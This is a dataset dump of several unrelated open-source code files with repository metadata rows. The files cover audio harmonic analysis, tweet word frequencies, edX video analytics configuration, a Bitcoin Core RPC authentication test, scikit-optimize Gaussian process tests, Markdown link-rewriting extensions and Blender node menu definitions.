L = ( pc['L'][0] + pc['L'][1] ) / 2
#print T, L
harms = harmonics_data.HarmonicsData(dirname, basename)
decays, f0, B, harm_stats = harms.get_data()
nf, nb, stats = mode_decays.handle_decays(decays,
basename, f0, B, T, L, harm_stats,
plot=plot, recalc=recalc)
return nf, nb, stats, harm_stats
def get_header():
fields = ["name", "B1", "B2", "$R^2$",
"notes", "alpha 1", "alpha 2", "alpha 3",
"alpha 4", "alpha 5", "alpha 10"]
return '\t'.join(fields)
def get_info(basename, nf, nb, stats):
notes = adjust_decays.notes_decays(basename)
text = "%s\t%.3g\t%.3g\t%.2f\t%s\t%.1f\t%.1f\t%.1f\t%.1f\t%.1f\t%.1f" % (
tables.anonymize_name(basename),
nf, nb,
stats.rsquared,
notes,
stats.alpha_1, stats.alpha_2, stats.alpha_3,
stats.alpha_4, stats.alpha_5,
stats.alpha_10,
)
return text
def get_stats_header():
fields = ["name", "total partials",
"max not above noise",
"num not above noise",
"not sufficient drop",
"high variance",
"cannot fit",
"low $R^2$",
"decays used", "highest mode", "notes"]
return '\t'.join(fields)
def get_stats_info(basename, stats):
notes = adjust_decays.notes_removing(basename)
text = "%s\t%i\t%i\t%i\t%i\t%i\t%i\t%i\t%i\t%i\t%s" % (
tables.anonymize_name(basename),
stats.num_harms_original,
stats.num_harms_max_no_above_noise,
stats.num_harms_num_no_above_noise,
stats.num_harms_no_drop,
stats.num_harms_no_variance,
stats.num_harms_no_fit,
stats.num_harms_no_rsquared,
stats.num_harms_end,
stats.highest_harm,
notes,
)
return text
if __name__ == "__main__":
try:
#dirname = sys.argv[1]
dirname = "yvr"
basename = sys.argv[1]
except:
print "biology.py DIRNAME BASENAME"
if not os.path.isdir("out"):
os.makedirs("out")
nf, nb, stats, harm_stats = process(dirname, basename, plot=True)
print get_header()
print get_info(basename, nf, nb, stats)
print
print get_stats_header()
print get_stats_info(basename, harm_stats)
| gpl-3.0 | -686,684,109,385,111,900 | 26.352941 | 77 | 0.58638 | false |
ylam/DataScienceCoursera | frequency_2.py | 1 | 1211 | import sys
import json
def hw():
print 'Hello, world!'
def lines(fp):
print str(len(fp.readlines()))
def main():
tweet_file = open(sys.argv[1])
#hw()
#lines(sent_file)
#lines(tweet_file)
#save tweet files
myData = {}
#save tweet counts
Result = {}
#save frequency
Frequency = {}
CountAllTerms = 0;
for line in tweet_file:
#Save every line into myData
myData = json.loads(line)
#print "Line " + str(i)
#print myData
#print myData.keys()
if "text" in myData and "lang" in myData:
if myData["lang"] == 'en':
#Split each word found in the text and sum the value of sentiment.
tweet = myData["text"]
tweet = tweet.lower()
words = tweet.split()
for word in words:
if word not in Result:
Result[word] = 1;
elif word in Result:
Result[word] = Result[word] + 1;
CountAllTerms = CountAllTerms + 1;
#Output to standard out of tweet # and its sentiment score
#print Result.items()
print "Occurence of all terms " + str(CountAllTerms);
for term in Result:
Frequency[term] = Result[term] / (CountAllTerms * 1.0)
print Frequency.items()
if __name__ == '__main__':
main()
| gpl-2.0 | 8,787,856,851,238,190,000 | 21.425926 | 69 | 0.609414 | false |
edx/edxanalytics | src/edxanalytics/edxmodules/video_analytics/common.py | 1 | 3765 | """
Configuration for every video player / site.
- Properties (prefix none): names of video properties (e.g., autoplay on?)
- Events (prefix EVT): names of video events (e.g., video_play)
To add a new target, simply copy an existing block, paste, and modify.
- normal values: boolean or string or list with one item
- doesn't exist: empty string or list (e.g., '', [])
- multiple values: list (e.g., ['a', 'b', 'c'])
- hierarchical values: nested list (e.g., ['a', ['aa']])
"""
import ast
"""
The edX trackinglog schema...
"track_trackinglog"
("username" varchar(32) NOT NULL,
"dtcreated" datetime NOT NULL,
"event_source" varchar(32) NOT NULL,
"event_type" varchar(512) NOT NULL,
"ip" varchar(32) NOT NULL,
"agent" varchar(256) NOT NULL,
"event" text NOT NULL,
{"id":"i4x-MITx-6_002x-video-S1V1_Motivation_for_6_002x",
"code":"4rpg8Bq6hb4",
"currentTime":0,
"speed":"1.0"}
"host" varchar(64) NOT NULL DEFAULT '',
"time" datetime NOT NULL,
"id" integer PRIMARY KEY,
"page" varchar(512) NULL);
"""
EDX_CONF = {
### properties ###
# Does the video autoplay?
'AUTOPLAY_VIDEOS': True,
# Where is this video hosted?
'VIDEO_HOST': 'youtube',
# Where is the absolute timestamp of an event stored?
'TIMESTAMP': 'time',
# Where is the event type information stored?
'TYPE_EVENT': 'event_type',
# Where is the username stored?
'USERNAME': 'username',
# Where is the video ID stored?
'VIDEO_ID': ['event', ['code']],
# Where is the video name stored?
'VIDEO_NAME': ['event', ['id']],
# Where is the relative video timestamp stored?
'VIDEO_TIME': ['event', ['currentTime']],
# Where is the play speed stored?
'VIDEO_SPEED': ['event', ['speed']],
### events ###
# Where is the page open event?
'EVT_PAGE_OPEN': ['page_open'],
# Where is the page close event?
'EVT_PAGE_CLOSE': ['page_close'],
# Where is the next destination event?
'EVT_NEXT_DST': ['seq_goto', 'seq_next', 'seq_prev'],
# Where is the player pause event?
'EVT_VIDEO_PAUSE': ['pause_video'],
# Where is the player play event?
'EVT_VIDEO_PLAY': ['play_video'],
# Where is the player seek event?
'EVT_VIDEO_SEEK': [],
# Where is the fullscreen event?
'EVT_VIDEO_FULLSCREEN': [],
# Where is the volume up event?
'EVT_VIDEO_VOLUME_UP': [],
# Where is the volume down event?
'EVT_VIDEO_VOLUME_DOWN': [],
# Where is the volume mute event?
'EVT_VIDEO_VOLUME_MUTE': [],
}
# This is how external files access configuration parameters.
# Need to be changed to any other XX_CONF when using non-edX platforms
CONF = EDX_CONF
def get_inner_prop(obj, prop):
"""
Has recursive handling for hierarchical data formats.
"""
if isinstance(obj, str) or isinstance(obj, unicode):
try:
obj = ast.literal_eval(obj)
except ValueError:
pass
#print "value error, ignoring line"
except SyntaxError:
pass
#print "syntax error, ignoring line"
if isinstance(prop, str) or isinstance(prop, unicode):
if prop not in obj:
return ""
else:
return obj[prop]
elif isinstance(prop, list):
if len(prop) == 2:
return get_inner_prop(obj[prop[0]], prop[1])
if len(prop) == 1:
try:
value = obj[prop[0]]
except:
value = ""
return value
return ""
def get_prop(obj, prop):
"""
Get property values for the given (obj, prop) pair.
"""
if prop == "" or prop not in CONF:
return ""
feature = CONF[prop]
return get_inner_prop(obj, feature)
| agpl-3.0 | -8,471,714,969,963,333,000 | 30.638655 | 74 | 0.592563 | false |
tjps/bitcoin | test/functional/rpc_users.py | 1 | 4247 | #!/usr/bin/env python3
# Copyright (c) 2015-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multiple RPC users."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
get_datadir_path,
str_to_b64str,
)
import os
import http.client
import urllib.parse
import subprocess
from random import SystemRandom
import string
import configparser
import sys
def call_with_auth(node, user, password):
url = urllib.parse.urlparse(node.url)
headers = {"Authorization": "Basic " + str_to_b64str('{}:{}'.format(user, password))}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
conn.close()
return resp
class HTTPBasicsTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 2
self.supports_cli = False
def setup_chain(self):
super().setup_chain()
#Append rpcauth to bitcoin.conf before initialization
self.rtpassword = "cA773lm788buwYe4g4WT+05pKyNruVKjQ25x3n0DQcM="
rpcauth = "rpcauth=rt:93648e835a54c573682c2eb19f882535$7681e9c5b74bdd85e78166031d2058e1069b3ed7ed967c93fc63abba06f31144"
self.rpcuser = "rpcuser💻"
self.rpcpassword = "rpcpassword🔑"
config = configparser.ConfigParser()
config.read_file(open(self.options.configfile))
gen_rpcauth = config['environment']['RPCAUTH']
# Generate RPCAUTH with specified password
self.rt2password = "8/F3uMDw4KSEbw96U3CA1C4X05dkHDN2BPFjTgZW4KI="
p = subprocess.Popen([sys.executable, gen_rpcauth, 'rt2', self.rt2password], stdout=subprocess.PIPE, universal_newlines=True)
lines = p.stdout.read().splitlines()
rpcauth2 = lines[1]
# Generate RPCAUTH without specifying password
self.user = ''.join(SystemRandom().choice(string.ascii_letters + string.digits) for _ in range(10))
p = subprocess.Popen([sys.executable, gen_rpcauth, self.user], stdout=subprocess.PIPE, universal_newlines=True)
lines = p.stdout.read().splitlines()
rpcauth3 = lines[1]
self.password = lines[3]
with open(os.path.join(get_datadir_path(self.options.tmpdir, 0), "bitcoin.conf"), 'a', encoding='utf8') as f:
f.write(rpcauth+"\n")
f.write(rpcauth2+"\n")
f.write(rpcauth3+"\n")
with open(os.path.join(get_datadir_path(self.options.tmpdir, 1), "bitcoin.conf"), 'a', encoding='utf8') as f:
f.write("rpcuser={}\n".format(self.rpcuser))
f.write("rpcpassword={}\n".format(self.rpcpassword))
def test_auth(self, node, user, password):
self.log.info('Correct...')
assert_equal(200, call_with_auth(node, user, password).status)
self.log.info('Wrong...')
assert_equal(401, call_with_auth(node, user, password+'wrong').status)
self.log.info('Wrong...')
assert_equal(401, call_with_auth(node, user+'wrong', password).status)
self.log.info('Wrong...')
assert_equal(401, call_with_auth(node, user+'wrong', password+'wrong').status)
def run_test(self):
##################################################
# Check correctness of the rpcauth config option #
##################################################
url = urllib.parse.urlparse(self.nodes[0].url)
self.test_auth(self.nodes[0], url.username, url.password)
self.test_auth(self.nodes[0], 'rt', self.rtpassword)
self.test_auth(self.nodes[0], 'rt2', self.rt2password)
self.test_auth(self.nodes[0], self.user, self.password)
###############################################################
# Check correctness of the rpcuser/rpcpassword config options #
###############################################################
url = urllib.parse.urlparse(self.nodes[1].url)
self.test_auth(self.nodes[1], self.rpcuser, self.rpcpassword)
if __name__ == '__main__':
HTTPBasicsTest ().main ()
| mit | 5,873,558,166,899,214,000 | 38.635514 | 133 | 0.624853 | false |
ccauet/scikit-optimize | skopt/learning/gaussian_process/tests/test_gpr.py | 1 | 3320 | import numpy as np
import pytest
from scipy import optimize
from sklearn.utils.testing import assert_almost_equal
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_false
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_array_equal
from skopt.learning import GaussianProcessRegressor
from skopt.learning.gaussian_process.kernels import RBF
from skopt.learning.gaussian_process.kernels import Matern
from skopt.learning.gaussian_process.kernels import WhiteKernel
from skopt.learning.gaussian_process.gpr import _param_for_white_kernel_in_Sum
rng = np.random.RandomState(0)
X = rng.randn(5, 5)
y = rng.randn(5)
rbf = RBF()
wk = WhiteKernel()
mat = Matern()
kernel1 = rbf
kernel2 = mat + rbf
kernel3 = mat * rbf
kernel4 = wk * rbf
kernel5 = mat + rbf * wk
def predict_wrapper(X, gpr):
"""Predict that can handle 1-D input"""
X = np.expand_dims(X, axis=0)
return gpr.predict(X, return_std=True)
@pytest.mark.fast_test
@pytest.mark.parametrize("kernel", [kernel1, kernel2, kernel3, kernel4])
def test_param_for_white_kernel_in_Sum(kernel):
kernel_with_noise = kernel + wk
wk_present, wk_param = _param_for_white_kernel_in_Sum(kernel + wk)
assert_true(wk_present)
kernel_with_noise.set_params(
**{wk_param: WhiteKernel(noise_level=0.0)})
assert_array_equal(kernel_with_noise(X), kernel(X))
assert_false(_param_for_white_kernel_in_Sum(kernel5)[0])
@pytest.mark.fast_test
def test_noise_equals_gaussian():
gpr1 = GaussianProcessRegressor(rbf + wk).fit(X, y)
# gpr2 sets the noise component to zero at predict time.
gpr2 = GaussianProcessRegressor(rbf, noise="gaussian").fit(X, y)
assert_false(gpr1.noise_)
assert_true(gpr2.noise_)
assert_almost_equal(gpr1.kernel_.k2.noise_level, gpr2.noise_, 4)
mean1, std1 = gpr1.predict(X, return_std=True)
mean2, std2 = gpr2.predict(X, return_std=True)
assert_array_almost_equal(mean1, mean2, 4)
assert_false(np.any(std1 == std2))
@pytest.mark.fast_test
def test_mean_gradient():
length_scale = np.arange(1, 6)
X = rng.randn(10, 5)
y = rng.randn(10)
X_new = rng.randn(5)
rbf = RBF(length_scale=length_scale, length_scale_bounds="fixed")
gpr = GaussianProcessRegressor(rbf, random_state=0).fit(X, y)
mean, std, mean_grad = gpr.predict(
np.expand_dims(X_new, axis=0),
return_std=True, return_cov=False, return_mean_grad=True)
num_grad = optimize.approx_fprime(
X_new, lambda x: predict_wrapper(x, gpr)[0], 1e-4)
assert_array_almost_equal(mean_grad, num_grad, decimal=3)
@pytest.mark.fast_test
def test_std_gradient():
length_scale = np.arange(1, 6)
X = rng.randn(10, 5)
y = rng.randn(10)
X_new = rng.randn(5)
rbf = RBF(length_scale=length_scale, length_scale_bounds="fixed")
gpr = GaussianProcessRegressor(rbf, random_state=0).fit(X, y)
_, _, _, std_grad = gpr.predict(
np.expand_dims(X_new, axis=0),
return_std=True, return_cov=False, return_mean_grad=True,
return_std_grad=True)
num_grad = optimize.approx_fprime(
X_new, lambda x: predict_wrapper(x, gpr)[1], 1e-4)
assert_array_almost_equal(std_grad, num_grad, decimal=3)
| bsd-3-clause | 1,136,411,059,373,997,400 | 31.871287 | 78 | 0.697289 | false |
sarimak/generator | markdown_extensions.py | 1 | 2173 | #!/usr/bin/python3
# coding: utf-8
""" Register two Markdown extensions which replace <a href=""> and
<img src=""> with {{ url_for('') }} and {{ resource('') }} placeholders
which can be rewritten to absolute URLs and path to static resources. """
import markdown
import markdown.inlinepatterns
class UrlForExtension(markdown.Extension):
""" Custom handler for URL parsing within the Markdown. """
def extendMarkdown(self, parser, _):
pattern = UrlForPattern(markdown.inlinepatterns.LINK_RE, parser)
parser.inlinePatterns["link"] = pattern
class UrlForPattern(markdown.inlinepatterns.LinkPattern):
""" Delegates mangling of link targets in Markdown to url_for() """
def handleMatch(self, match):
anchor = super().handleMatch(match)
href = anchor.get("href")
anchor.set("href", "{{{{ url_for('{}') }}}}".format(href))
return anchor
class ResourceExtension(markdown.Extension):
""" Custom handler for image parsing within the Markdown. """
def extendMarkdown(self, parser, _):
pattern = ResourcePattern(markdown.inlinepatterns.IMAGE_LINK_RE, parser)
parser.inlinePatterns["image_link"] = pattern
class ResourcePattern(markdown.inlinepatterns.ImagePattern):
""" Delegates mangling of image sources in Markdown to resource() """
def handleMatch(self, match):
img = super().handleMatch(match)
src = img.get("src")
img.set("src", "{{{{ resource('{}') }}}}".format(src))
return img
EXTENSIONS = [UrlForExtension(), ResourceExtension()]
# pylint: disable=C0111
def parse(markup):
""" Parse the provided Markdown using the custom handlers. """
return markdown.markdown(markup, extensions=EXTENSIONS)
def test_resource_for_extension():
assert parse("") == \
'<p><img alt="desc" src="{{ resource(\'picture.png\') }}" /></p>'
def test_url_for_extension():
assert parse("#title") == "<h1>title</h1>"
assert parse("[desc](locator)") == \
'<p><a href="{{ url_for(\'locator\') }}">desc</a></p>'
if __name__ == "__main__":
import pytest
import sys
pytest.main(sys.argv[0])
| gpl-2.0 | -1,098,341,667,282,342,700 | 35.216667 | 80 | 0.649793 | false |
Microvellum/Fluid-Designer | win64-vc/2.78/Python/bin/2.78/scripts/startup/nodeitems_builtins.py | 1 | 19000 | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# <pep8 compliant>
import bpy
import nodeitems_utils
from nodeitems_utils import (
NodeCategory,
NodeItem,
NodeItemCustom,
)
# Subclasses for standard node types
class SortedNodeCategory(NodeCategory):
def __init__(self, identifier, name, description="", items=None):
# for builtin nodes the convention is to sort by name
if isinstance(items, list):
items = sorted(items, key=lambda item: item.label.lower())
super().__init__(identifier, name, description, items)
class CompositorNodeCategory(SortedNodeCategory):
@classmethod
def poll(cls, context):
return (context.space_data.tree_type == 'CompositorNodeTree')
class ShaderNewNodeCategory(SortedNodeCategory):
@classmethod
def poll(cls, context):
return (context.space_data.tree_type == 'ShaderNodeTree' and
context.scene.render.use_shading_nodes)
class ShaderOldNodeCategory(SortedNodeCategory):
@classmethod
def poll(cls, context):
return (context.space_data.tree_type == 'ShaderNodeTree' and
not context.scene.render.use_shading_nodes)
class TextureNodeCategory(SortedNodeCategory):
@classmethod
def poll(cls, context):
return context.space_data.tree_type == 'TextureNodeTree'
# menu entry for node group tools
def group_tools_draw(self, layout, context):
layout.operator("node.group_make")
layout.operator("node.group_ungroup")
layout.separator()
# maps node tree type to group node type
node_tree_group_type = {
'CompositorNodeTree': 'CompositorNodeGroup',
'ShaderNodeTree': 'ShaderNodeGroup',
'TextureNodeTree': 'TextureNodeGroup',
}
# generic node group items generator for shader, compositor and texture node groups
def node_group_items(context):
if context is None:
return
space = context.space_data
if not space:
return
ntree = space.edit_tree
if not ntree:
return
yield NodeItemCustom(draw=group_tools_draw)
def contains_group(nodetree, group):
if nodetree == group:
return True
else:
for node in nodetree.nodes:
if node.bl_idname in node_tree_group_type.values() and node.node_tree is not None:
if contains_group(node.node_tree, group):
return True
return False
for group in context.blend_data.node_groups:
if group.bl_idname != ntree.bl_idname:
continue
# filter out recursive groups
if contains_group(group, ntree):
continue
yield NodeItem(node_tree_group_type[group.bl_idname],
group.name,
{"node_tree": "bpy.data.node_groups[%r]" % group.name})
# only show input/output nodes inside node groups
def group_input_output_item_poll(context):
space = context.space_data
if space.edit_tree in bpy.data.node_groups.values():
return True
return False
# only show input/output nodes when editing line style node trees
def line_style_shader_nodes_poll(context):
snode = context.space_data
return (snode.tree_type == 'ShaderNodeTree' and
snode.shader_type == 'LINESTYLE')
# only show nodes working in world node trees
def world_shader_nodes_poll(context):
snode = context.space_data
return (snode.tree_type == 'ShaderNodeTree' and
snode.shader_type == 'WORLD')
# only show nodes working in object node trees
def object_shader_nodes_poll(context):
snode = context.space_data
return (snode.tree_type == 'ShaderNodeTree' and
snode.shader_type == 'OBJECT')
# All standard node categories currently used in nodes.
shader_node_categories = [
# Shader Nodes
ShaderOldNodeCategory("SH_INPUT", "Input", items=[
NodeItem("ShaderNodeMaterial"),
NodeItem("ShaderNodeCameraData"),
NodeItem("ShaderNodeFresnel"),
NodeItem("ShaderNodeLayerWeight"),
NodeItem("ShaderNodeLampData"),
NodeItem("ShaderNodeValue"),
NodeItem("ShaderNodeRGB"),
NodeItem("ShaderNodeTexture"),
NodeItem("ShaderNodeGeometry"),
NodeItem("ShaderNodeExtendedMaterial"),
NodeItem("ShaderNodeParticleInfo"),
NodeItem("ShaderNodeObjectInfo"),
NodeItem("NodeGroupInput", poll=group_input_output_item_poll),
]),
ShaderOldNodeCategory("SH_OUTPUT", "Output", items=[
NodeItem("ShaderNodeOutput"),
NodeItem("NodeGroupOutput", poll=group_input_output_item_poll),
]),
ShaderOldNodeCategory("SH_OP_COLOR", "Color", items=[
NodeItem("ShaderNodeMixRGB"),
NodeItem("ShaderNodeRGBCurve"),
NodeItem("ShaderNodeInvert"),
NodeItem("ShaderNodeHueSaturation"),
NodeItem("ShaderNodeGamma"),
]),
ShaderOldNodeCategory("SH_OP_VECTOR", "Vector", items=[
NodeItem("ShaderNodeNormal"),
NodeItem("ShaderNodeMapping"),
NodeItem("ShaderNodeVectorCurve"),
NodeItem("ShaderNodeVectorTransform"),
NodeItem("ShaderNodeNormalMap"),
]),
ShaderOldNodeCategory("SH_CONVERTOR", "Converter", items=[
NodeItem("ShaderNodeValToRGB"),
NodeItem("ShaderNodeRGBToBW"),
NodeItem("ShaderNodeMath"),
NodeItem("ShaderNodeVectorMath"),
NodeItem("ShaderNodeSqueeze"),
NodeItem("ShaderNodeSeparateRGB"),
NodeItem("ShaderNodeCombineRGB"),
NodeItem("ShaderNodeSeparateHSV"),
NodeItem("ShaderNodeCombineHSV"),
]),
ShaderOldNodeCategory("SH_GROUP", "Group", items=node_group_items),
ShaderOldNodeCategory("SH_LAYOUT", "Layout", items=[
NodeItem("NodeFrame"),
NodeItem("NodeReroute"),
]),
# New Shader Nodes (Cycles)
ShaderNewNodeCategory("SH_NEW_INPUT", "Input", items=[
NodeItem("ShaderNodeTexCoord"),
NodeItem("ShaderNodeAttribute"),
NodeItem("ShaderNodeLightPath"),
NodeItem("ShaderNodeFresnel"),
NodeItem("ShaderNodeLayerWeight"),
NodeItem("ShaderNodeRGB"),
NodeItem("ShaderNodeValue"),
NodeItem("ShaderNodeTangent"),
NodeItem("ShaderNodeNewGeometry"),
NodeItem("ShaderNodeWireframe"),
NodeItem("ShaderNodeObjectInfo"),
NodeItem("ShaderNodeHairInfo"),
NodeItem("ShaderNodeParticleInfo"),
NodeItem("ShaderNodeCameraData"),
NodeItem("ShaderNodeUVMap"),
NodeItem("ShaderNodeUVAlongStroke", poll=line_style_shader_nodes_poll),
NodeItem("NodeGroupInput", poll=group_input_output_item_poll),
]),
ShaderNewNodeCategory("SH_NEW_OUTPUT", "Output", items=[
NodeItem("ShaderNodeOutputMaterial", poll=object_shader_nodes_poll),
NodeItem("ShaderNodeOutputLamp", poll=object_shader_nodes_poll),
NodeItem("ShaderNodeOutputWorld", poll=world_shader_nodes_poll),
NodeItem("ShaderNodeOutputLineStyle", poll=line_style_shader_nodes_poll),
NodeItem("NodeGroupOutput", poll=group_input_output_item_poll),
]),
ShaderNewNodeCategory("SH_NEW_SHADER", "Shader", items=[
NodeItem("ShaderNodeMixShader"),
NodeItem("ShaderNodeAddShader"),
NodeItem("ShaderNodeBsdfDiffuse", poll=object_shader_nodes_poll),
NodeItem("ShaderNodeBsdfPrincipled", poll=object_shader_nodes_poll),
NodeItem("ShaderNodeBsdfGlossy", poll=object_shader_nodes_poll),
NodeItem("ShaderNodeBsdfTransparent", poll=object_shader_nodes_poll),
NodeItem("ShaderNodeBsdfRefraction", poll=object_shader_nodes_poll),
NodeItem("ShaderNodeBsdfGlass", poll=object_shader_nodes_poll),
NodeItem("ShaderNodeBsdfTranslucent", poll=object_shader_nodes_poll),
NodeItem("ShaderNodeBsdfAnisotropic", poll=object_shader_nodes_poll),
NodeItem("ShaderNodeBsdfVelvet", poll=object_shader_nodes_poll),
NodeItem("ShaderNodeBsdfToon", poll=object_shader_nodes_poll),
NodeItem("ShaderNodeSubsurfaceScattering", poll=object_shader_nodes_poll),
NodeItem("ShaderNodeEmission", poll=object_shader_nodes_poll),
NodeItem("ShaderNodeBsdfHair", poll=object_shader_nodes_poll),
NodeItem("ShaderNodeBackground", poll=world_shader_nodes_poll),
NodeItem("ShaderNodeAmbientOcclusion", poll=object_shader_nodes_poll),
NodeItem("ShaderNodeHoldout", poll=object_shader_nodes_poll),
NodeItem("ShaderNodeVolumeAbsorption"),
NodeItem("ShaderNodeVolumeScatter"),
]),
ShaderNewNodeCategory("SH_NEW_TEXTURE", "Texture", items=[
NodeItem("ShaderNodeTexImage"),
NodeItem("ShaderNodeTexEnvironment"),
NodeItem("ShaderNodeTexSky"),
NodeItem("ShaderNodeTexNoise"),
NodeItem("ShaderNodeTexWave"),
NodeItem("ShaderNodeTexVoronoi"),
NodeItem("ShaderNodeTexMusgrave"),
NodeItem("ShaderNodeTexGradient"),
NodeItem("ShaderNodeTexMagic"),
NodeItem("ShaderNodeTexChecker"),
NodeItem("ShaderNodeTexBrick"),
NodeItem("ShaderNodeTexPointDensity"),
]),
ShaderNewNodeCategory("SH_NEW_OP_COLOR", "Color", items=[
NodeItem("ShaderNodeMixRGB"),
NodeItem("ShaderNodeRGBCurve"),
NodeItem("ShaderNodeInvert"),
NodeItem("ShaderNodeLightFalloff"),
NodeItem("ShaderNodeHueSaturation"),
NodeItem("ShaderNodeGamma"),
NodeItem("ShaderNodeBrightContrast"),
]),
ShaderNewNodeCategory("SH_NEW_OP_VECTOR", "Vector", items=[
NodeItem("ShaderNodeMapping"),
NodeItem("ShaderNodeBump"),
NodeItem("ShaderNodeNormalMap"),
NodeItem("ShaderNodeNormal"),
NodeItem("ShaderNodeVectorCurve"),
NodeItem("ShaderNodeVectorTransform"),
]),
ShaderNewNodeCategory("SH_NEW_CONVERTOR", "Converter", items=[
NodeItem("ShaderNodeMath"),
NodeItem("ShaderNodeValToRGB"),
NodeItem("ShaderNodeRGBToBW"),
NodeItem("ShaderNodeVectorMath"),
NodeItem("ShaderNodeSeparateRGB"),
NodeItem("ShaderNodeCombineRGB"),
NodeItem("ShaderNodeSeparateXYZ"),
NodeItem("ShaderNodeCombineXYZ"),
NodeItem("ShaderNodeSeparateHSV"),
NodeItem("ShaderNodeCombineHSV"),
NodeItem("ShaderNodeWavelength"),
NodeItem("ShaderNodeBlackbody"),
]),
ShaderNewNodeCategory("SH_NEW_SCRIPT", "Script", items=[
NodeItem("ShaderNodeScript"),
]),
ShaderNewNodeCategory("SH_NEW_GROUP", "Group", items=node_group_items),
ShaderNewNodeCategory("SH_NEW_LAYOUT", "Layout", items=[
NodeItem("NodeFrame"),
NodeItem("NodeReroute"),
]),
]
compositor_node_categories = [
# Compositor Nodes
CompositorNodeCategory("CMP_INPUT", "Input", items=[
NodeItem("CompositorNodeRLayers"),
NodeItem("CompositorNodeImage"),
NodeItem("CompositorNodeMovieClip"),
NodeItem("CompositorNodeMask"),
NodeItem("CompositorNodeRGB"),
NodeItem("CompositorNodeValue"),
NodeItem("CompositorNodeTexture"),
NodeItem("CompositorNodeBokehImage"),
NodeItem("CompositorNodeTime"),
NodeItem("CompositorNodeTrackPos"),
NodeItem("NodeGroupInput", poll=group_input_output_item_poll),
]),
CompositorNodeCategory("CMP_OUTPUT", "Output", items=[
NodeItem("CompositorNodeComposite"),
NodeItem("CompositorNodeViewer"),
NodeItem("CompositorNodeSplitViewer"),
NodeItem("CompositorNodeOutputFile"),
NodeItem("CompositorNodeLevels"),
NodeItem("NodeGroupOutput", poll=group_input_output_item_poll),
]),
CompositorNodeCategory("CMP_OP_COLOR", "Color", items=[
NodeItem("CompositorNodeMixRGB"),
NodeItem("CompositorNodeAlphaOver"),
NodeItem("CompositorNodeInvert"),
NodeItem("CompositorNodeCurveRGB"),
NodeItem("CompositorNodeHueSat"),
NodeItem("CompositorNodeColorBalance"),
NodeItem("CompositorNodeHueCorrect"),
NodeItem("CompositorNodeBrightContrast"),
NodeItem("CompositorNodeGamma"),
NodeItem("CompositorNodeColorCorrection"),
NodeItem("CompositorNodeTonemap"),
NodeItem("CompositorNodeZcombine"),
]),
CompositorNodeCategory("CMP_CONVERTOR", "Converter", items=[
NodeItem("CompositorNodeMath"),
NodeItem("CompositorNodeValToRGB"),
NodeItem("CompositorNodeSetAlpha"),
NodeItem("CompositorNodePremulKey"),
NodeItem("CompositorNodeIDMask"),
NodeItem("CompositorNodeRGBToBW"),
NodeItem("CompositorNodeSepRGBA"),
NodeItem("CompositorNodeCombRGBA"),
NodeItem("CompositorNodeSepHSVA"),
NodeItem("CompositorNodeCombHSVA"),
NodeItem("CompositorNodeSepYUVA"),
NodeItem("CompositorNodeCombYUVA"),
NodeItem("CompositorNodeSepYCCA"),
NodeItem("CompositorNodeCombYCCA"),
NodeItem("CompositorNodeSwitchView"),
]),
CompositorNodeCategory("CMP_OP_FILTER", "Filter", items=[
NodeItem("CompositorNodeBlur"),
NodeItem("CompositorNodeBilateralblur"),
NodeItem("CompositorNodeDilateErode"),
NodeItem("CompositorNodeDespeckle"),
NodeItem("CompositorNodeFilter"),
NodeItem("CompositorNodeBokehBlur"),
NodeItem("CompositorNodeVecBlur"),
NodeItem("CompositorNodeDefocus"),
NodeItem("CompositorNodeGlare"),
NodeItem("CompositorNodeInpaint"),
NodeItem("CompositorNodeDBlur"),
NodeItem("CompositorNodePixelate"),
NodeItem("CompositorNodeSunBeams"),
]),
CompositorNodeCategory("CMP_OP_VECTOR", "Vector", items=[
NodeItem("CompositorNodeNormal"),
NodeItem("CompositorNodeMapValue"),
NodeItem("CompositorNodeMapRange"),
NodeItem("CompositorNodeNormalize"),
NodeItem("CompositorNodeCurveVec"),
]),
CompositorNodeCategory("CMP_MATTE", "Matte", items=[
NodeItem("CompositorNodeKeying"),
NodeItem("CompositorNodeKeyingScreen"),
NodeItem("CompositorNodeChannelMatte"),
NodeItem("CompositorNodeColorSpill"),
NodeItem("CompositorNodeBoxMask"),
NodeItem("CompositorNodeEllipseMask"),
NodeItem("CompositorNodeLumaMatte"),
NodeItem("CompositorNodeDiffMatte"),
NodeItem("CompositorNodeDistanceMatte"),
NodeItem("CompositorNodeChromaMatte"),
NodeItem("CompositorNodeColorMatte"),
NodeItem("CompositorNodeDoubleEdgeMask"),
]),
CompositorNodeCategory("CMP_DISTORT", "Distort", items=[
NodeItem("CompositorNodeScale"),
NodeItem("CompositorNodeLensdist"),
NodeItem("CompositorNodeMovieDistortion"),
NodeItem("CompositorNodeTranslate"),
NodeItem("CompositorNodeRotate"),
NodeItem("CompositorNodeFlip"),
NodeItem("CompositorNodeCrop"),
NodeItem("CompositorNodeDisplace"),
NodeItem("CompositorNodeMapUV"),
NodeItem("CompositorNodeTransform"),
NodeItem("CompositorNodeStabilize"),
NodeItem("CompositorNodePlaneTrackDeform"),
NodeItem("CompositorNodeCornerPin"),
]),
CompositorNodeCategory("CMP_GROUP", "Group", items=node_group_items),
CompositorNodeCategory("CMP_LAYOUT", "Layout", items=[
NodeItem("NodeFrame"),
NodeItem("NodeReroute"),
NodeItem("CompositorNodeSwitch"),
]),
]
texture_node_categories = [
# Texture Nodes
TextureNodeCategory("TEX_INPUT", "Input", items=[
NodeItem("TextureNodeCurveTime"),
NodeItem("TextureNodeCoordinates"),
